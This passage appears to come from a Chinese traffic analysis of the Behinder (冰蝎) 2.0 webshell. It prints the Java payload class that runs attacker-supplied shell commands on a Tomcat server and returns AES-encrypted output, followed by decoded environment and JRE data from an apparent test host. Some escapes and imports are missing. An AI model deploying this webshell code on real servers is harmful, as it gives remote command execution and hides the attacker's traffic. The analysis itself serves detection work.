import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.jsp.PageContext;

public class Cmd {
    public static String cmd;
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;

    public Cmd() {
    }

    public boolean equals(Object obj) {
        PageContext page = (PageContext)obj;
        this.Session = page.getSession();
        this.Response = page.getResponse();
        this.Request = page.getRequest();
        page.getResponse().setCharacterEncoding("UTF-8");
        HashMap result = new HashMap();

        try {
            result.put("msg", this.RunCMD(cmd));
            result.put("status", "success");
        } catch (Exception var13) {
            result.put("msg", var13.getMessage());
            result.put("status", "success");
        } finally {
            try {
                ServletOutputStream so = this.Response.getOutputStream();
                so.write(this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
                so.flush();
                so.close();
                page.getOut().clear();
            } catch (Exception var12) {
                var12.printStackTrace();
            }

        }

        return true;
    }

    private String RunCMD(String cmd) throws Exception {
        Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding"));
        String result = "";
        if (cmd != null && cmd.length() > 0) {
            Process p;
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) {
                p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd});
            } else {
                p = Runtime.getRuntime().exec(cmd);
            }

            BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream(), "GB2312"));

            for(String disr = br.readLine(); disr != null; disr = br.readLine()) {
                result = result + disr + "n";
            }

            result = new String(result.getBytes(osCharset));
        }

        return result;
    }

    private byte[] Encrypt(byte[] bs) throws Exception {
        String key = this.Session.getAttribute("u").toString();
        byte[] raw = key.getBytes("utf-8");
        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(1, skeySpec);
        byte[] encrypted = cipher.doFinal(bs);
        return encrypted;
    }

    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
        StringBuilder sb = new StringBuilder();
        String version = System.getProperty("java.version");
        sb.append("{");
        Iterator var6 = entity.keySet().iterator();

        while(var6.hasNext()) {
            String key = (String)var6.next();
            sb.append(""" + key + "":"");
            String value = ((String)entity.get(key)).toString();
            if (encode) {
                Class Base64;
                Object Encoder;
                if (version.compareTo("1.9") >= 0) {
                    this.getClass();
                    Base64 = Class.forName("java.util.Base64");
                    Encoder = Base64.getMethod("getEncoder", (Class[])null).invoke(Base64, (Object[])null);
                    value = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes("UTF-8"));
                } else {
                    this.getClass();
                    Base64 = Class.forName("sun.misc.BASE64Encoder");
                    Encoder = Base64.newInstance();
                    value = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes("UTF-8"));
                    value = value.replace("n", "").replace("r", "");
                }
            }

            sb.append(value);
            sb.append("",");
        }

        if (sb.toString().endsWith(",")) {
            sb.setLength(sb.length() - 1);
        }

        sb.append("}");
        return sb.toString();
    }
}

响应内容首先为获取java环境变量与上述phpinfo类似
如下：

b'Mac OS X10.15.6x86_64'
b'/;'
b'/Users/gnosis/Documents/java/tomcat-8.5.58/bin'
b'<br/><font size=2 color=red>xe7x8exafxe5xa2x83xe5x8fx98xe9x87x8f:</font><br/>PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/Applications/VMware Fusion.app/Contents/Public:/Library/Apple/usr/bin:/Applications/IntelliJ IDEA.app/Contents/plugins/maven/lib/maven3/bin<br/>JAVA_8_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home<br/>JAVA_MAIN_CLASS_1682=org.apache.catalina.startup.Bootstrap<br/>CATALINA_TMPDIR=/Users/gnosis/Documents/java/tomcat-8.5.58/temp<br/>JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home<br/>JAVA_OPTS=-Dcom.sun.management.jmxremote= -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.password.file=/Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web/jmxremote.password -Dcom.sun.management.jmxremote.access.file=/Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web/jmxremote.access -Djava.rmi.server.hostname=127.0.0.1 -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027<br/>JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home<br/>CATALINA_BASE=/Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web<br/>MAVEN_HOME=/Applications/IntelliJ IDEA.app/Contents/plugins/maven/lib/maven3/bin<br/>VERSIONER_PYTHON_VERSION=2.7<br/>LOGNAME=gnosis<br/>XPC_SERVICE_NAME=com.jetbrains.intellij.53472<br/>PWD=/Users/gnosis/Documents/java/tomcat-8.5.58/bin<br/>SHELL=/bin/zsh<br/>LSCOLORS=ExFxBxDxCxegedabagacad<br/>CATALINA_HOME=/Users/gnosis/Documents/java/tomcat-8.5.58<br/>JDK_JAVA_OPTIONS= --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED<br/>USER=gnosis<br/>CLICOLOR=1<br/>CLASSPATH=/Users/gnosis/Documents/java/tomcat-8.5.58/bin/bootstrap.jar:/Users/gnosis/Documents/java/tomcat-8.5.58/bin/tomcat-juli.jar<br/>JAVA_14_HOME=/Library/Java/JavaVirtualMachines/jdk-14.0.2.jdk/Contents/Home<br/>TMPDIR=/var/folders/03/h3fjv_s96lj08b44kw_q9dch0000gn/T/<br/>SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.pfXhzacqdF/Listeners<br/>XPC_FLAGS=0x0<br/>__CF_USER_TEXT_ENCODING=0x1F5:0x19:0x34<br/>LC_CTYPE=zh_CN.UTF-8<br/>HOME=/Users/gnosis<br/>SHLVL=0<br/><br/><font size=2 color=red>JRExe7xb3xbbxe7xbbx9fxe5xb1x9exe6x80xa7:</font><br/>java.vendor = Oracle Corporation<br/>sun.java.launcher = SUN_STANDARD<br/>catalina.base = /Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web<br/>sun.management.compiler = HotSpot 64-Bit Tiered Compilers<br/>catalina.useNaming = true<br/>os.name = Mac OS X<br/>sun.boot.class.path = /Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/resources.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/rt.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/sunrsasign.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/jsse.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/jce.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/charsets.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/jfr.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/classes<br/>java.util.logging.config.file = /Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web/conf/logging.properties<br/>com.sun.management.jmxremote = <br/>java.vm.specification.vendor = Oracle Corporation<br/>java.runtime.version = 1.8.0_201-b09<br/>user.name = gnosis<br/>tomcat.util.scan.StandardJarScanFilter.jarsToScan = log4j-taglib*.jar,log4j-web*.jar,log4javascript*.jar,slf4j-taglib*.jar<br/>shared.loader = <br/>tomcat.util.buf.StringCache.byte.enabled = true<br/>java.naming.factory.initial = org.apache.naming.java.javaURLContextFactory<br/>user.language = zh<br/>sun.boot.library.path = /Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib<br/>com.sun.management.jmxremote.port = 1099<br/>jdk.tls.ephemeralDHKeySize = 2048<br/>java.version = 1.8.0_201<br/>java.util.logging.manager = org.apache.juli.ClassLoaderLogManager<br/>user.timezone = Asia/Shanghai<br/>sun.arch.data.model = 64<br/>java.util.concurrent.ForkJoinPool.common.threadFactory = org.apache.catalina.startup.SafeForkJoinWorkerThreadFactory<br/>java.endorsed.dirs = /Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/endorsed<br/>java.rmi.server.randomIDs = true<br/>sun.cpu.isalist = <br/>sun.jnu.encoding = UTF-8<br/>file.encoding.pkg = sun.io<br/>package.access = sun.,org.apache.catalina.,org.apache.coyote.,org.apache.jasper.,org.apache.tomcat.<br/>file.separator = /<br/>java.specification.name = Java Platform API Specification<br/>java.class.version = 52.0<br/>user.country = CN<br/>java.home = /Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre<br/>java.vm.info = mixed mode<br/>os.version = 10.15.6<br/>com.sun.management.jmxremote.ssl = false<br/>path.separator = :<br/>java.vm.version = 25.201-b09<br/>java.protocol.handler.pkgs = org.apache.catalina.webresources<br/>java.awt.printerjob = sun.lwawt.macosx.CPrinterJob<br/>sun.io.unicode.encoding = UnicodeBig<br/>awt.toolkit = sun.lwawt.macosx.LWCToolkit<br/>package.definition = sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.jasper.,org.apache.naming.,org.apache.tomcat.<br/>java.naming.factory.url.pkgs = org.apache.naming<br/>user.home = /Users/gnosis<br/>org.apache.catalina.security.SecurityListener.UMASK = 0027<br/>java.specification.vendor = Oracle Corporation<br/>tomcat.util.scan.StandardJarScanFilter.jarsToSkip = annotations-api.jar,ant-junit*.jar,ant-launcher.jar,ant.jar,asm-*.jar,aspectj*.jar,bootstrap.jar,catalina-ant.jar,catalina-ha.jar,catalina-jmx-remote.jar,catalina-storeconfig.jar,catalina-tribes.jar,catalina-ws.jar,catalina.jar,cglib-*.jar,cobertura-*.jar,commons-beanutils*.jar,commons-codec*.jar,commons-collections*.jar,commons-daemon.jar,commons-dbcp*.jar,commons-digester*.jar,commons-fileupload*.jar,commons-httpclient*.jar,commons-io*.jar,commons-lang*.jar,commons-logging*.jar,commons-math*.jar,commons-pool*.jar,dom4j-*.jar,easymock-*.jar,ecj-*.jar,el-api.jar,geronimo-spec-jaxrpc*.jar,h2*.jar,hamcrest-*.jar,hibernate*.jar,httpclient*.jar,icu4j-*.jar,jasper-el.jar,jasper.jar,jaspic-api.jar,jaxb-*.jar,jaxen-*.jar,jdom-*.jar,jetty-*.jar,jmx-tools.jar,jmx.jar,jsp-api.jar,jstl.jar,jta*.jar,junit-*.jar,junit.jar,log4j*.jar,mail*.jar,objenesis-*.jar,oraclepki.jar,oro-*.jar,servlet-api-*.jar,servlet-api.jar,slf4j*.jar,taglibs-standard-spec-*.jar,tagsoup-*.jar,tomcat-api.jar,tomcat-coyote.jar,tomcat-dbcp.jar,tomcat-i18n-*.jar,tomcat-jdbc.jar,tomcat-jni.jar,tomcat-juli-adapters.jar,tomcat-juli.jar,tomcat-util-scan.jar,tomcat-util.jar,tomcat-websocket.jar,tools.jar,websocket-api.jar,wsdl4j*.jar,xercesImpl.jar,xml-apis.jar,xmlParserAPIs-*.jar,xmlParserAPIs.jar,xom-*.jar<br/>java.library.path = /Users/gnosis/Library/Java/Extensions:/Library/Java/Extensions:/Network/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java:.<br/>java.vendor.url = http://java.oracle.com/<br/>java.vm.vendor = Oracle Corporation<br/>gopherProxySet = false<br/>common.loader = "/Users/gnosis/Documents/java/tomcat-8.5.58/lib","/Users/gnosis/Documents/java/tomcat-8.5.58/lib/*.jar","${catalina.home}/lib","${catalina.home}/lib/*.jar"<br/>java.runtime.name = Java(TM) SE Runtime Environment<br/>sun.java.command = org.apache.catalina.startup.Bootstrap start<br/>java.class.path = /Users/gnosis/Documents/java/tomcat-8.5.58/bin/bootstrap.jar:/Users/gnosis/Documents/java/tomcat-8.5.58/bin/tomcat-juli.jar<br/>com.sun.management.jmxremote.access.file = /Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web/jmxremote.access<br/>java.vm.specification.name = Java Virtual Machine Specification<br/>java.vm.specification.version = 1.8<br/>catalina.home = /Users/gnosis/Documents/java/tomcat-8.5.58<br/>sun.cpu.endian = little<br/>sun.os.patch.level = unknown<br/>java.io.tmpdir = /Users/gnosis/Documents/java/tomcat-8.5.58/temp<br/>java.vendor.url.bug = http://bugreport.sun.com/bugreport/<br/>server.loader = <br/>java.rmi.server.hostname = 127.0.0.1<br/>os.arch = x86_64<br/>java.awt.graphicsenv = sun.awt.CGraphicsEnvironment<br/>java.ext.dirs = /Users/gnosis/Library/Java/Extensions:/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home/jre/lib/ext:/Library/Java/Extensions:/Network/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java<br/>user.dir = /Users/gnosis/Documents/java/tomcat-8.5.58/bin<br/>line.separator = n<br/>java.vm.name = Java HotSpot(TM) 64-Bit Server VM<br/>ignore.endorsed.dirs = <br/>file.encoding = UTF-8<br/>com.sun.management.jmxremote.password.file = /Users/gnosis/Library/Caches/JetBrains/IntelliJIdea2020.2/tomcat/Tomcat_8_5_58_java_web/jmxremote.password<br/>java.specification.version = 1.8<br/>'

本文始发于微信公众号（黑伞攻防实验室）：开胃菜:冰蝎2.0流量分析